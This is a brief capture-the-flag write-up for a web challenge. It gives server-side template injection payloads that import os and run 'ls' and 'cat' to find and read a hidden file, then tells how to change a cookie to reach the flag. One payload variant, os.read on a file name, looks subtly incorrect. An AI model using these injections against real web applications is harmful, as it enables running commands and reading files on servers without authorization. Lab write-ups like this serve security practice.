The first page of the website requires server side template injection 
  A rough input check function was implemented to prevent any harmful (also any at all) code injection
  It checks input, determines approximate expected output, stores that, then pushes that onto the template
In the input name box, {%import os%}{{os.popen('ls').read()}} or {%import os%}{{os.listdir()}} reveal a file named lookatme.txt
{%import os%}{{os.popen('cat lookatme.txt').read()}} or {%import os%}{{os.read('lookatme.txt')}} can be used to read the file, which directs the user to /parttwooftheproblem

The /namecheck page has white text hidden on it, revealing the value that the cookie needs to be changed to in order to reveal the flag on /parttwooftheproblem
